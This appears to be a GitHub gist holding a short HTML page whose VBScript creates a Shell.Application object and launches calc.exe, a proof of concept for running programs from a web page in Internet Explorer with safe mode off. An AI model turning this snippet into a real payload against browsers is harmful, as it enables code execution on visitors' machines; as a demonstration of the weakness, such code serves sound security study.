Skip to content

Instantly share code, notes, and snippets.

@c0d3inj3cT
Created November 16, 2014 11:50
Show Gist options
  • Save c0d3inj3cT/740fc849ba49ca0c52fc to your computer and use it in GitHub Desktop.
Save c0d3inj3cT/740fc849ba49ca0c52fc to your computer and use it in GitHub Desktop.
IE SafeMode Example
<html>
<title>IE SafeMode</title>
<script language="vbscript">
Set obj = CreateObject("Shell.Application")
obj.ShellExecute("calc.exe");
</script>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment